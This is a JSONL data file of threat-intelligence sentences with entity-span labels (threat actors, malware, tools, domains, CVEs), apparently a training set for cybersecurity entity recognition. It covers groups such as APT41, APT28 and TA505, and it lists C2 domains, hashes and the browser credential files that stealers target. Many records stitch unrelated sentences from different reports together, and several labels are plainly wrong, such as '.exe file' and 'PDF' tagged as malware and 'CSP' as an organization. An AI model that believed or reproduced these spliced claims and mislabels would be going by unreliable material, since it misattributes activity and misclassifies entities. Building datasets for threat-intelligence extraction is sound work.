{"text": "Ben Baker , Edmund Brumaghin and Jonah Samost of Talos have a fantastic write-up of this process here .", "spans": {"ORGANIZATION: Talos": [[49, 54]]}, "info": {"id": "cyberner_stix_train_006361", "source": "cyberner_stix_train"}}
{"text": "When attackers used Winnti to maintain access to web servers , they hid the implant in plain sight by masquerading it as a trusted , legitimate file .", "spans": {"MALWARE: Winnti": [[20, 26]]}, "info": {"id": "cyberner_stix_train_006362", "source": "cyberner_stix_train"}}
{"text": "When the botnet came back online , TA505 campaigns quickly returned , usually at even greater scale than before the disruption .", "spans": {"THREAT_ACTOR: TA505": [[35, 40]]}, "info": {"id": "cyberner_stix_train_006363", "source": "cyberner_stix_train"}}
{"text": "In a recent attack , APT33 sent spear-phishing emails to workers in the aviation industry . The UPX gave a warning message about memory buffer overflow .", "spans": {"THREAT_ACTOR: APT33": [[21, 26]], "ORGANIZATION: aviation industry": [[72, 89]], "TOOL: UPX": [[96, 99]]}, "info": {"id": "cyberner_stix_train_006364", "source": "cyberner_stix_train"}}
{"text": "In the 2016 version , the value of the User-Agent header changed , as did the method of generating the relative path in the URL : now the part before /index.php is a mix of a pronounceable ( if not entirely meaningful ) word and random letters and numbers , for example , “ muromec280j9tqeyjy5sm1qy71 ” or “ parabbelumf8jgybdd6w0qa0 ” . TG-3390 uses the PlugX remote access tool . We also considered the move as an obfuscation technique , as it was mixed with a lot of script kiddie activities that can easily be mistaken for grey noise online . In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": {"THREAT_ACTOR: TG-3390": [[337, 344]], "TOOL: PlugX remote access tool": [[354, 378]], "MALWARE: CloudLook": [[567, 576]]}, "info": {"id": "cyberner_stix_train_006365", "source": "cyberner_stix_train"}}
{"text": "Some of them like takephoto , takevideo , recordaudio , getsentsms and uploadpictures are focused on espionage activities . While investigating one of these infections involving White Lambert ( network-driven implant ) and Blue Lambert ( active implant ) , we found yet another family of tools that appear to be related . The IXESHE attackers are notable for their use of compromised machines within a target ’s internal network as C&C servers . In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n’t granular enough .", "spans": {"TOOL: White Lambert": [[178, 191]], "TOOL: Blue Lambert": [[223, 235]], "THREAT_ACTOR: IXESHE": [[326, 332]], "TOOL: C&C": [[432, 435]], "SYSTEM: Google Analytics platform": [[453, 478]], "ORGANIZATION: CSP": [[631, 634]]}, "info": {"id": "cyberner_stix_train_006366", "source": "cyberner_stix_train"}}
{"text": "Gorgon Group used common URL shortening services to download payloads . According to Cheetah Mobile’s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK .", "spans": {"THREAT_ACTOR: Gorgon Group": [[0, 12]], "FILEPATH: Batmobi": [[178, 185]], "FILEPATH: Duapps": [[188, 194]], "FILEPATH: Cheetah SDK": [[213, 224]]}, "info": {"id": "cyberner_stix_train_006367", "source": "cyberner_stix_train"}}
{"text": "Our team went ahead and hunted for samples of the app and analyzed it in our labs . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government , with a mission that would benefit nation-state geopolitical and economic needs .", "spans": {"MALWARE: BalkanDoor": [[117, 127]], "VULNERABILITY: CVE-2018-20250": [[312, 326]], "ORGANIZATION: Iranian Government": [[433, 451]], "ORGANIZATION: nation-state geopolitical": [[488, 513]], "ORGANIZATION: economic": [[518, 526]]}, "info": {"id": "cyberner_stix_train_006368", "source": "cyberner_stix_train"}}
{"text": "Some of the settings are Boolean values that act as switches . Once a valid card with a malicious EMV chip is detected , RIPPER will instantiate a timer to allow a thief to control the machine . However , they later continued by making modifications to the Excel document just prior to the attack on August 26th .", "spans": {"MALWARE: RIPPER": [[121, 127]]}, "info": {"id": "cyberner_stix_train_006369", "source": "cyberner_stix_train"}}
{"text": "Officials at BLU could n't be immediately reached for comment . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . C2 : phot.healthsvsolu.com .", "spans": {"ORGANIZATION: BLU": [[13, 16]], "THREAT_ACTOR: threat groups": [[154, 167]], "VULNERABILITY: CVE-2018-0798": [[186, 199]], "TOOL: RTF weaponizer": [[209, 223]], "TOOL: C2": [[226, 228]], "DOMAIN: phot.healthsvsolu.com": [[231, 252]]}, "info": {"id": "cyberner_stix_train_006370", "source": "cyberner_stix_train"}}
{"text": "Given that both organizations appear to describe similar ( if not identical ) activity , any reasonable person could ( and should ) ask – why the inconsistency in naming and identification .", "spans": {}, "info": {"id": "cyberner_stix_train_006371", "source": "cyberner_stix_train"}}
{"text": "ELF Utilities 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 This seems confusing as FireEye earlier publicly declared the \" TRITON actor \" as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" . The domains were registered in November 2019 and operationalized shortly after . To prevent ProxyNotShell exploitation on older Microsoft Exchange servers , Microsoft released a blog4 advocating for a custom inside the Microsoft IIS server supporting Exchange .", "spans": {"ORGANIZATION: FireEye": [[298, 305]], "TOOL: TRITON": [[338, 344]], "ORGANIZATION: research institution": [[396, 416]], "THREAT_ACTOR: TEMP.Veles": [[442, 452]], "SYSTEM: Microsoft Exchange servers": [[585, 611]], "ORGANIZATION: Microsoft": [[614, 623]]}, "info": {"id": "cyberner_stix_train_006372", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //apple-icloud [ . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . The send counter is also passed to the AdrGen function as the part number parameter and is visible in the query string as depicted below: Query: 239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil , Response: 39.2.3.1 , Query: 230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil , Response: 39.2.3.2 , Query: 392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil . Attacks start with VBA code to decode the next malware stage All campaigns start with Microsoft Office documents , which are possibly sent to the targets as email attachments .", "spans": {"ORGANIZATION: governments": [[169, 180]], "ORGANIZATION: militaries": [[185, 195]], "ORGANIZATION: defense attaches": [[198, 214]], "ORGANIZATION: media entities": [[217, 231]], "ORGANIZATION: dissidents": [[238, 248]], "ORGANIZATION: figures": [[253, 260]], "MALWARE: AdrGen": [[344, 350]], "FILEPATH: 239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil": [[450, 567]], "IP_ADDRESS: 39.2.3.1": [[580, 588]], "FILEPATH: 230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil": [[598, 717]], "IP_ADDRESS: 39.2.3.2": [[730, 738]], "FILEPATH: 392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil": [[748, 868]]}, "info": {"id": "cyberner_stix_train_006373", "source": "cyberner_stix_train"}}
{"text": "If an intruder compromises a computer that has been onboarded to Windows Defender ATP , SOC personnel can isolate the computer from the network , blocking command and control of the implant and preventing attackers from installing additional malware and moving laterally to other computers in the network .", "spans": {"TOOL: Windows Defender ATP": [[65, 85]]}, "info": {"id": "cyberner_stix_train_006374", "source": "cyberner_stix_train"}}
{"text": "The group installed multiple tools within the environment , including three different tools on a strategically important server , likely to provide contingency access options .", "spans": {}, "info": {"id": "cyberner_stix_train_006375", "source": "cyberner_stix_train"}}
{"text": "Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds , if not thousands , of corporations around the world . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": {"THREAT_ACTOR: MSS": [[73, 76]], "FILEPATH: .lnk file": [[245, 254]], "SYSTEM: Windows": [[287, 294]], "FILEPATH: .wsc": [[317, 321]]}, "info": {"id": "cyberner_stix_train_006376", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //mailsa-wqp [ . For full details , please reference our 2014 report , APT28 : A Window into Russia 's Cyber Espionage Operations . The differences between PoisonFrog and Glimpse highlight the ease at which adversaries can modify their tools to meet their end . The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": {"THREAT_ACTOR: APT28": [[84, 89]], "MALWARE: PoisonFrog": [[169, 179]], "MALWARE: Glimpse": [[184, 191]], "THREAT_ACTOR: Winnti group": [[279, 291]], "ORGANIZATION: pharmaceutics": [[356, 369]], "ORGANIZATION: telecommunications": [[374, 392]]}, "info": {"id": "cyberner_stix_train_006377", "source": "cyberner_stix_train"}}
{"text": "'' The trojan calls this function with the action GLOBAL_ACTION_BACK , which equals the pressing of the back button on the device , thus canceling the opening of the anti-virus application . The archive contains an .exe file , sometimes disguised as a Microsoft Word file , a video , or another file format , using the corresponding icon . While researching these attacks , we discovered an undocumented , custom malware family – which we ’ve named Dudell . Adversaries may perform data destruction over the course of an operation .", "spans": {"MALWARE: .exe file": [[215, 224]], "MALWARE: Microsoft Word file": [[252, 271]], "MALWARE: Dudell": [[449, 455]], "ORGANIZATION: Adversaries": [[458, 469]]}, "info": {"id": "cyberner_stix_train_006378", "source": "cyberner_stix_train"}}
{"text": "key3.db Firefox private keys ( now named key4.db ) cert8.db Firefox certificate database logins.json Firefox encrypted password database account.cfn The Bat ! ( email client ) account credentials wand.dat Opera password database .", "spans": {"FILEPATH: key3.db": [[0, 7]], "TOOL: Firefox": [[8, 15], [60, 67], [101, 108]], "FILEPATH: key4.db": [[41, 48]], "FILEPATH: cert8.db": [[51, 59]], "FILEPATH: logins.json": [[89, 100]], "FILEPATH: account.cfn": [[137, 148]], "TOOL: email": [[161, 166]], "FILEPATH: wand.dat": [[196, 204]], "TOOL: Opera": [[205, 210]]}, "info": {"id": "cyberner_stix_train_006379", "source": "cyberner_stix_train"}}
{"text": "Symantec saw the first evidence of Sowbug-related activity with the discovery in March 2017 of an entirely new piece of malware called Felismus used against a target in Southeast Asia . As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "TOOL: Felismus": [[135, 143]], "ORGANIZATION: Kurdish activists": [[307, 324]], "THREAT_ACTOR: Flying Kitten actor group": [[369, 394]]}, "info": {"id": "cyberner_stix_train_006380", "source": "cyberner_stix_train"}}
{"text": "This signals just how long ago the Poseidon threat actor was already working on its offensive framework . The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails .", "spans": {"THREAT_ACTOR: Poseidon threat actor": [[35, 56]], "MALWARE: PDF": [[140, 143]], "MALWARE: DOC files": [[148, 157]], "TOOL: emails": [[186, 192]]}, "info": {"id": "cyberner_stix_train_006381", "source": "cyberner_stix_train"}}
{"text": "Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": {"MALWARE: KHNP documents": [[20, 34]], "THREAT_ACTOR: actors": [[54, 60]], "ORGANIZATION: South Korean Government": [[134, 157]], "MALWARE: NetTraveler": [[278, 289]], "ORGANIZATION: diplomats": [[314, 323]], "ORGANIZATION: embassies": [[326, 335]], "ORGANIZATION: government institutions": [[340, 363]]}, "info": {"id": "cyberner_stix_train_006382", "source": "cyberner_stix_train"}}
{"text": "The Sofacy developer modified the f4player ’s ActionScript to include additional code to load an embedded Flash object .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]], "TOOL: f4player": [[34, 42]], "TOOL: ActionScript": [[46, 58]], "TOOL: Flash": [[106, 111]]}, "info": {"id": "cyberner_stix_train_006383", "source": "cyberner_stix_train"}}
{"text": "A fake alert will notify and urge the user to access the malicious domain and download XLoader . We identified this APT group coded as ‘APT-C-35’ in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage . If the host is successfully reached , the script renames a file named “ kernel.dll ” , obviously not the real one , in “ uninstall.exe ” , another misleading name .", "spans": {"MALWARE: XLoader": [[87, 94]], "THREAT_ACTOR: ‘APT-C-35’": [[135, 145]], "FILEPATH: kernel.dll": [[315, 325]], "FILEPATH: uninstall.exe": [[364, 377]]}, "info": {"id": "cyberner_stix_train_006384", "source": "cyberner_stix_train"}}
{"text": "What ’ s innovative about this ransomware is how it displays its ransom note . Additionally , during that time , members of Gorgon Group were also performing criminal operations against targets across the globe , often using shared infrastructure with their targeted attack operations . An incorrect choice of control flow dispatcher and first block ( algorithm error ) Mandiant has observed RGB units utilize a series of Operational Relay Boxes ( ORBs ) using L2TP IPsec tunnels along with commercial VPN providers to obscure their source address .", "spans": {"THREAT_ACTOR: Gorgon Group": [[124, 136]], "TOOL: shared infrastructure": [[225, 246]], "ORGANIZATION: Mandiant": [[370, 378]]}, "info": {"id": "cyberner_stix_train_006385", "source": "cyberner_stix_train"}}
{"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Group-IB Bot-trek TDS sensors are in place at a number of financial institutions and , unfortunately , we register that currently Corkow malware is present on 80% of protected corporate systems .", "spans": {"MALWARE: flare-qdb": [[18, 27]], "ORGANIZATION: Group-IB": [[86, 94]], "ORGANIZATION: financial institutions": [[144, 166]], "MALWARE: Corkow": [[216, 222]], "MALWARE: malware": [[223, 230]]}, "info": {"id": "cyberner_stix_train_006386", "source": "cyberner_stix_train"}}
{"text": "They are both targeting businesses using accounting software , are fingerprinting systems of interest similarly , are looking for smart card readers , and finally , they deploy an array of malicious tools to spy on their victims . For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": {"ORGANIZATION: businesses": [[24, 34]], "MALWARE: FrozenCell": [[263, 273]], "MALWARE: Tawjihi 2016": [[300, 312]], "ORGANIZATION: students": [[346, 354]]}, "info": {"id": "cyberner_stix_train_006387", "source": "cyberner_stix_train"}}
{"text": "In the past , the group used droppers that installed both the SPLM and AZZY backdoors on the same machine .", "spans": {"MALWARE: SPLM": [[62, 66]], "MALWARE: AZZY backdoors": [[71, 85]]}, "info": {"id": "cyberner_stix_train_006388", "source": "cyberner_stix_train"}}
{"text": "And like CORESHELL , the new malware attempts to download a second-stage executable .", "spans": {"MALWARE: CORESHELL": [[9, 18]]}, "info": {"id": "cyberner_stix_train_006389", "source": "cyberner_stix_train"}}
{"text": "This information stealer is augmented by a variety of components that the toolset operators may selectively include with the main component to provide additional functionalities , such as multiple methods of establishing persistence , as well as modules that attempt to exploit privilege escalation vulnerabilities in order to execute CosmicDuke with higher privileges .", "spans": {"TOOL: information stealer": [[5, 24]], "MALWARE: CosmicDuke": [[335, 345]]}, "info": {"id": "cyberner_stix_train_006390", "source": "cyberner_stix_train"}}
{"text": "Update your device : Keep your device up-to-date with the latest security patches . While the group has not yet demonstrated an ICS capability , RASPITE 's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the way for later potential ICS events . It includes an RC4 key ( which is XORed with 0x37 ) that is used to decrypt a filename and the embedded DLL file . Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": {"THREAT_ACTOR: group": [[94, 99]], "TOOL: ICS": [[128, 131], [329, 332]], "THREAT_ACTOR: RASPITE": [[145, 152]], "ORGANIZATION: IT": [[279, 281]], "TOOL: RC4 key": [[357, 364]], "TOOL: XORed with 0x37": [[376, 391]], "TOOL: DLL": [[446, 449]], "ORGANIZATION: Talos": [[580, 585]], "TOOL: Open Babel": [[651, 661]]}, "info": {"id": "cyberner_stix_train_006391", "source": "cyberner_stix_train"}}
{"text": "We therefore believe the Dukes to work either within or directly for a government , thus ruling out the possibility of a criminal gang or another third party .", "spans": {"THREAT_ACTOR: Dukes": [[25, 30]]}, "info": {"id": "cyberner_stix_train_006392", "source": "cyberner_stix_train"}}
{"text": "The payload exploits a local privilege escalation vulnerability in the Windows kernel if it detects that it is running with limited privileges .", "spans": {"SYSTEM: Windows": [[71, 78]]}, "info": {"id": "cyberner_stix_train_006393", "source": "cyberner_stix_train"}}
{"text": "Quasar serve does not even verify that a file was requested from the victim .", "spans": {"MALWARE: Quasar": [[0, 6]]}, "info": {"id": "cyberner_stix_train_006394", "source": "cyberner_stix_train"}}
{"text": "In this paper we focus only on BlackEnergy samples known to be used specifically by the actors we identify as Quedagh , who seem to have a particular interest in political targets . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"TOOL: BlackEnergy samples": [[31, 50]], "THREAT_ACTOR: actors": [[88, 94]], "THREAT_ACTOR: Quedagh": [[110, 117]], "ORGANIZATION: political targets": [[162, 179]], "ORGANIZATION: governments": [[319, 330]], "ORGANIZATION: militaries": [[333, 343]], "ORGANIZATION: defense attaches": [[346, 362]], "ORGANIZATION: media entities": [[365, 379]], "ORGANIZATION: dissidents": [[386, 396]], "ORGANIZATION: figures": [[401, 408]], "ORGANIZATION: Russian government": [[432, 450]]}, "info": {"id": "cyberner_stix_train_006395", "source": "cyberner_stix_train"}}
{"text": ") Let ’ s take a more detailed look at how this banking Trojan works . Kaspersky released a similar report about the same group under the name Carbanak in February 2015 . This version of KONNI is not designed to execute code on the infected system .", "spans": {"ORGANIZATION: Kaspersky": [[71, 80]], "THREAT_ACTOR: group": [[122, 127]], "THREAT_ACTOR: Carbanak": [[143, 151]], "MALWARE: KONNI": [[187, 192]]}, "info": {"id": "cyberner_stix_train_006396", "source": "cyberner_stix_train"}}
{"text": "The main goal of Silence.Downloader is to receive an executable file and run it on an infected machine . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region .", "spans": {"MALWARE: Silence.Downloader": [[17, 35]], "ORGANIZATION: FireEye 's DTI": [[137, 151]], "TOOL: emails": [[173, 179]], "FILEPATH: malicious attachments": [[191, 212]], "ORGANIZATION: banks": [[236, 241]]}, "info": {"id": "cyberner_stix_train_006397", "source": "cyberner_stix_train"}}
{"text": "android.media.RINGER_MODE_CHANGED android.sms.msg.action.SMS_SEND android.sms.msg.action.SMS_DELIVERED Creating a Web Server to Phish XLoader creates a provisional web server to receive the broadcast events . From the attack activity captured this time , it is obvious that Donot APT group is still keen on Pakistan as primary target of attack , and even expands scope of attack to include Pakistani staffs and institutions in China . The script is quite different from the previous one : it guarantees its persistence on the victim machine through the setting of “ HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run ” registry key , creating a new entry named “ Windows Anytime Upgrade ” which points to “ winserv.exe ” , just stored into the same folder .", "spans": {"MALWARE: XLoader": [[134, 141]], "THREAT_ACTOR: Donot APT group": [[274, 289]], "SYSTEM: Windows": [[663, 670]], "FILEPATH: winserv.exe": [[707, 718]]}, "info": {"id": "cyberner_stix_train_006398", "source": "cyberner_stix_train"}}
{"text": "Curiously , several of these have included the world \" Fateh '' in their package name , which may be referring to the Fatah political party . Lazarus attacks are not a local problem and clearly the group 's operations span across the whole world . However , the U.S. has also been a country of significant interest to the group , with 18 organizations attacked over the past three years , including a number of Fortune 500 companies . Almost immediately after its channel ’s creation , the group began posting files from compromised Ukrainian organizations .", "spans": {"ORGANIZATION: Fatah": [[118, 123]], "THREAT_ACTOR: group": [[198, 203]], "ORGANIZATION: Ukrainian organizations": [[533, 556]]}, "info": {"id": "cyberner_stix_train_006399", "source": "cyberner_stix_train"}}
{"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec telemetry , we have seen infections in multiple countries due to the nature of the victims operating large international corporations . Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar .", "spans": {"ORGANIZATION: Symantec": [[88, 96]], "MALWARE: legitimate traffic": [[250, 268]]}, "info": {"id": "cyberner_stix_train_006400", "source": "cyberner_stix_train"}}
{"text": "ESET have been tracking the malicious activities related to the Ke3chang group . In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . The group also deploys the SOGU and CROSSWALK malware families as means to maintain presence . APT41 sent spear-phishing emails to multiple HR employees three days after the compromise had been remediated and systems were brought back online . APT41 also deploys the SOGU and CROSSWALK malware families as means to maintain presence . Within hours of a user opening the malicious attachment dropping a HOMEUNIX backdoor , APT41 regained a foothold within the environment by installing PHOTO on the organization's servers across multiple geographic regions . Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1.1.1.1 . APT41 has been observed creating a RAR archive of targeted files for Exfiltration . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain . During multiple engagements , APT41 attempted to remove evidence of some of its activity by deleting Bash histories , clearing Windows security and system events , and modifying DNS management to avoid anti-virus detections . Explicit financially-motivated targeting is unusual among Chinese statesponsored threat groups , and evidence suggests APT41 has conducted simultaneous cyber crime and Cyber Espionage operations from 2014 onward . APT41 operations against higher education , travel services , and news/media firms provide some indication that the group also tracks individuals and conducts surveillance . For example , the group has repeatedly targeted call record information at telecom companies . APT41 has established and maintained strategic access to organizations in the healthcare , high-tech , and telecommunications sectors . The group’s financially motivated activity has primarily focused on the video game industry , where APT41 has manipulated virtual currencies and even attempted to deploy ransomware . In another instance , APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there , suggesting the group was tasked to reconnoiter the facility for security reasons . These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns . Interestingly , despite the significant effort required to execute supply chain compromises and the large number of affected organizations , APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers . Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs . The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations . APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions , including publicly available utilities , malware shared with other Chinese espionage operations , and tools unique to the group . Once in a victim organization , APT41 can leverage more sophisticated TTPs and deploy additional malware . APT41 often relies on spear-phishing emails with attachments such as compiled HTML ( .chm ) files to initially compromise their victims .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Ke3chang": [[64, 72]], "THREAT_ACTOR: APT41": [[101, 106], [311, 316], [460, 465], [638, 643], [894, 899], [1107, 1112], [1191, 1196], [1404, 1409], [1719, 1724], [1814, 1819], [2083, 2088], [2319, 2324], [2424, 2429], [2864, 2869], [3080, 3085], [3214, 3219], [3372, 3377], [3640, 3645], [3715, 3720]], "MALWARE: POISONPLUG": [[117, 127]], "MALWARE: HIGHNOON backdoor": [[168, 185]], "TOOL: emails": [[337, 343], [3752, 3758]], "MALWARE: SOGU": [[483, 487]], "MALWARE: CROSSWALK": [[492, 501]], "MALWARE: HOMEUNIX backdoor": [[618, 635]], "MALWARE: PHOTO": [[701, 706]], "ORGANIZATION: higher education": [[1839, 1855]], "ORGANIZATION: travel services": [[1858, 1873]], "ORGANIZATION: news/media firms": [[1880, 1896]], "ORGANIZATION: telecom": [[2063, 2070]], "ORGANIZATION: companies": [[2071, 2080]], "ORGANIZATION: healthcare": [[2161, 2171]], "ORGANIZATION: high-tech": [[2174, 2183]], "ORGANIZATION: telecommunications": [[2190, 2208]], "ORGANIZATION: sectors": [[2209, 2216]], "ORGANIZATION: video game industry": [[2291, 2310], [3261, 3280]], "THREAT_ACTOR: APT41’s": [[2666, 2673]], "MALWARE: malware families": [[3420, 3436]], "MALWARE: tools": [[3441, 3446]], "TOOL: HTML": [[3793, 3797]], "FILEPATH: .chm": [[3800, 3804]]}, "info": {"id": "cyberner_stix_train_006401", "source": "cyberner_stix_train"}}
{"text": "The malware establishes persistence and sends HTTP requests to the command and control domain mailsinfo.net .", "spans": {"DOMAIN: mailsinfo.net": [[94, 107]]}, "info": {"id": "cyberner_stix_train_006402", "source": "cyberner_stix_train"}}
{"text": "Utilizing Diamond Model methodology for characterizing activity by behaviors attached to victims , we began tracking TRITON S-MAL/TRISIS and immediate enabling activity as a distinct activity group ( collection of behaviors , infrastructure , and victimology ) designated XENOTIME .", "spans": {"MALWARE: TRITON S-MAL/TRISIS": [[117, 136]], "THREAT_ACTOR: XENOTIME": [[272, 280]]}, "info": {"id": "cyberner_stix_train_006403", "source": "cyberner_stix_train"}}
{"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) .", "spans": {"THREAT_ACTOR: APT32": [[27, 32]], "MALWARE: Microsoft ActiveMime file": [[74, 99]], "SYSTEM: Windows": [[255, 262]], "VULNERABILITY: zero-day": [[267, 275]], "VULNERABILITY: exploit": [[276, 283]], "VULNERABILITY: CVE-2014-4148": [[286, 299]]}, "info": {"id": "cyberner_stix_train_006404", "source": "cyberner_stix_train"}}
{"text": "The Ham Backdoor functions primarily as a modular platform , which provides the attacker with the ability to directly download additional modules and execute them in memory from the command and control ( C2 ) server . Binders are delivered by attack vectors ( such as phishing and watering hole attacks ) onto a machine .", "spans": {"TOOL: Ham Backdoor": [[4, 16]], "MALWARE: Binders": [[218, 225]]}, "info": {"id": "cyberner_stix_train_006405", "source": "cyberner_stix_train"}}
{"text": "Trojan activity At the time of the writing of this post , all URLs ( see IOC section ) found on the sample were inactive , and it does not seem to be widespread . When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed . We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission .", "spans": {"ORGANIZATION: CTU": [[168, 171]], "THREAT_ACTOR: LYCEUM": [[218, 224]], "ORGANIZATION: banks": [[350, 355]], "ORGANIZATION: media": [[358, 363]], "ORGANIZATION: government agencies": [[370, 389]], "THREAT_ACTOR: APT38": [[417, 422]]}, "info": {"id": "cyberner_stix_train_006406", "source": "cyberner_stix_train"}}
{"text": "However , Proofpoint researchers have recently observed phishing attacks that incorporate all of these elements in a single , multistep scheme involving the Marcher Android banking Trojan targeting customers of large Austrian banks . North Korean dictator Kim Jong Un has set ambitious economic goals , and some cybersecurity analysts have predicted he will unleash the Pyongyang-affiliated hackers to meet those deadlines by targeting multinational companies’ trade secrets . Leafminer : Raspite .", "spans": {"ORGANIZATION: Proofpoint": [[10, 20]], "MALWARE: Marcher": [[157, 164]], "THREAT_ACTOR: Pyongyang-affiliated hackers": [[370, 398]], "ORGANIZATION: multinational companies’": [[436, 460]], "THREAT_ACTOR: Leafminer": [[477, 486]], "THREAT_ACTOR: Raspite": [[489, 496]]}, "info": {"id": "cyberner_stix_train_006407", "source": "cyberner_stix_train"}}
{"text": "It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering . TEMP.Veles' lateral movement activities used a publicly-available PowerShell-based tool , WMImplant .", "spans": {"THREAT_ACTOR: Molerats": [[20, 28]], "THREAT_ACTOR: Gaza cybergang": [[35, 49]], "ORGANIZATION: politically": [[56, 67]], "THREAT_ACTOR: group": [[78, 83]], "THREAT_ACTOR: TEMP.Veles'": [[148, 159]], "MALWARE: PowerShell-based tool": [[214, 235]], "MALWARE: WMImplant": [[238, 247]]}, "info": {"id": "cyberner_stix_train_006408", "source": "cyberner_stix_train"}}
{"text": "] com through an upload queue . these attacks were part of a planned operation against specific targets in India . Congratulations_Jan-7.pdf : Inside , we break down the 5 most dangerous threats facing businesses this year — including LockBit and SocGholish — dissecting how they ’re delivered , where they spread , what they destroy , and the best practices to protect against them .", "spans": {"FILEPATH: Congratulations_Jan-7.pdf": [[115, 140]], "MALWARE: LockBit": [[235, 242]], "MALWARE: SocGholish": [[247, 257]]}, "info": {"id": "cyberner_stix_train_006409", "source": "cyberner_stix_train"}}
{"text": "The second macro file ~de03fc12a.docm dropped includes a simple macro to execute the dropped executable .", "spans": {"FILEPATH: ~de03fc12a.docm": [[22, 37]]}, "info": {"id": "cyberner_stix_train_006410", "source": "cyberner_stix_train"}}
{"text": "And that ’ s exactly what has happened recently . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . The campaign appears highly targeted and delivers a backdoor we have called ' Helminth ' .", "spans": {"ORGANIZATION: Kaspersky Lab": [[50, 63]], "VULNERABILITY: Microsoft Office exploits": [[87, 112]], "MALWARE: Exploit.MSWord.CVE-2010-333": [[160, 187]], "MALWARE: Exploit.Win32.CVE-2012-0158": [[190, 217]], "MALWARE: Helminth": [[298, 306]]}, "info": {"id": "cyberner_stix_train_006411", "source": "cyberner_stix_train"}}
